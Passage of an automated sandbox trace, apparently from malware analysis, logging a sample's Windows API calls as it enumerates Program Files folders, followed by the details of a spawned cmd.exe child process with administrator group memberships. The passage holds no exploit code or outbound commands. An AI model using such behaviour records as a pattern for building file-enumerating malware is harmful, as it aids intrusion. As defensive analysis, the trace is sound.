lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b809370, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Help", cAlternateFileName="MICROS~1")) returned 0 [0071.111] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0071.111] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0071.112] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Common Programs", cAlternateFileName="COMMON~1")) returned 1 [0071.115] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4404e88 | out: hHeap=0x5d0000) returned 1 [0071.115] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x245b0966, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x245b0966, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245d6b52, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x721, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0071.115] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0071.115] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x868ac6fd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x868ac6fd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0071.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4404e88 | out: hHeap=0x5d0000) returned 1 [0071.126] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8913323b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8913323b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="private", cAlternateFileName="")) returned 0 [0071.126] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0071.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43b20f0 | out: hHeap=0x5d0000) returned 1 [0071.126] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845a7d02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xaf31749c, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xaf31749c, ftLastWriteTime.dwHighDateTime=0x1d47c31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ProgramFilesCommonX64", cAlternateFileName="PROGRA~3")) returned 1 [0071.126] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4404e88 | out: hHeap=0x5d0000) returned 1 [0071.126] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x52ea133, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x52ea133, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0071.128] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.128] FindNextFileW (in: hFindFile=0x4260508, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2f7aa31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f7aa31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245fcdca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1702b0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0071.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.129] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x868ac6fd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0071.130] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.130] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf086f11e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf086f11e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf086f11e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0071.131] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.131] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0071.131] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.132] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2ca2e08, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14c6cb9, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x14c6cb9, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0071.132] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.132] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2e1f46, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xb976f98, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb976f98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0071.134] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.134] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12910b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26737b32, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26737b32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0071.136] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.136] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf472b09c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0071.136] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.136] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bb01a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bb01a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0071.138] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.138] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xceb38292, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xceb38292, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe172e9be, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x22cad0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0071.140] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.140] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x24bcc96d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x24bcc96d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="DataModel", cAlternateFileName="DATAMO~1")) returned 1 [0071.143] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4414e90 | out: hHeap=0x5d0000) returned 1 [0071.143] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348e918 | out: lpFindFileData=0x348e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17e0c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AnalysisServices.Common.dll", cAlternateFileName="MI1312~1.DLL")) returned 1 [0071.391] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4424e98 | out: hHeap=0x5d0000) returned 1 [0071.391] FindNextFileW (in: hFindFile=0x4260388, lpFindFileData=0x348e69c | out: lpFindFileData=0x348e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4befc00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0071.391] FindClose (in: hFindFile=0x4260388 | out: hFindFile=0x4260388) returned 1 [0071.391] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4414e90 | out: hHeap=0x5d0000) returned 1 [0071.391] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x348e918 | out: lpFindFileData=0x348e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x447d6b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x447d6b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44a38de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c190, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Spatial.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 1 [0071.392] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.393] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2803429, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2803429, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2803429, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0071.393] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.393] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4befc00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4befc00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x26a58c7d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x77e88, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="EXPSRV.DLL", cAlternateFileName="")) returned 1 [0071.394] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4414e90 | out: hHeap=0x5d0000) returned 1 [0071.394] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348e918 | out: lpFindFileData=0x348e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef915def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc8aa06f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8f6526, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 0 [0071.394] FindClose (in: hFindFile=0x4260708 | out: hFindFile=0x4260708) returned 1 [0071.394] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.394] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0fbc434, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0fbc434, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf10a1263, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2c40, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="OFFREL.DLL", cAlternateFileName="")) returned 1 [0071.395] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.396] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16be2c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xc8d02b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xc8d02b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0071.396] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.396] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc576616a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0071.396] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.396] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc62081b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc62081b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc62081b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1bac0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="FBIBLIO.DLL", cAlternateFileName="")) returned 1 [0071.397] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4414e90 | out: hHeap=0x5d0000) returned 1 [0071.397] FindNextFileW (in: hFindFile=0x4260588, lpFindFileData=0x348e918 | out: lpFindFileData=0x348e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x26bd6427, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x26bd6427, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x377ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="BASMLA.XSL", cAlternateFileName="")) returned 1 [0071.397] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43e4e78 | out: hHeap=0x5d0000) returned 1 [0071.397] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7beb2bc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7beb2bc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1cec0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="METCONV.DLL", cAlternateFileName="")) returned 1 [0071.397] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.398] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0ed7602, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0ed7602, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0ed7602, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0071.398] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.399] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5f76153, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TEXTCONV", cAlternateFileName="")) returned 1 [0071.399] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d4e70 | out: hHeap=0x5d0000) returned 1 [0071.399] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348ee10 | out: lpFindFileData=0x348ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES16", cAlternateFileName="")) returned 1 [0072.278] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4414e90 | out: hHeap=0x5d0000) returned 1 [0072.279] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27c86bce, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27c86bce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0072.279] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4414e90 | out: hHeap=0x5d0000) returned 1 [0072.279] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x26bd6427, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27abcfff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27abcfff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="AXIS", cAlternateFileName="")) returned 1 [0072.279] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4414e90 | out: hHeap=0x5d0000) returned 1 [0072.279] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348eb94 | out: lpFindFileData=0x348eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27a70c44, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x27a96da3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x27a96da3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x2e0000, cFileName="BLENDS", cAlternateFileName="")) returned 1 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6f7e000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe0c" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0xf64 [0057.875] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6b42a0000 [0057.875] __set_app_type (_Type=0x1) [0057.875] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6b42b6d00) returned 0x0 [0057.875] __getmainargs (in: _Argc=0x7ff6b42d9200, _Argv=0x7ff6b42d9208, _Env=0x7ff6b42d9210, _DoWildCard=0, _StartInfo=0x7ff6b42d921c | out: _Argc=0x7ff6b42d9200, _Argv=0x7ff6b42d9208, _Env=0x7ff6b42d9210) returned 0 [0057.875] _onexit (_Func=0x7ff6b42b7fd0) returned 0x7ff6b42b7fd0 [0057.875] _onexit (_Func=0x7ff6b42b7fe0) returned 0x7ff6b42b7fe0 [0057.875] _onexit (_Func=0x7ff6b42b7ff0) returned 0x7ff6b42b7ff0 [0057.875] _onexit (_Func=0x7ff6b42b8000) returned 0x7ff6b42b8000 [0057.876] _onexit (_Func=0x7ff6b42b8010) returned 0x7ff6b42b8010 [0057.876] _onexit 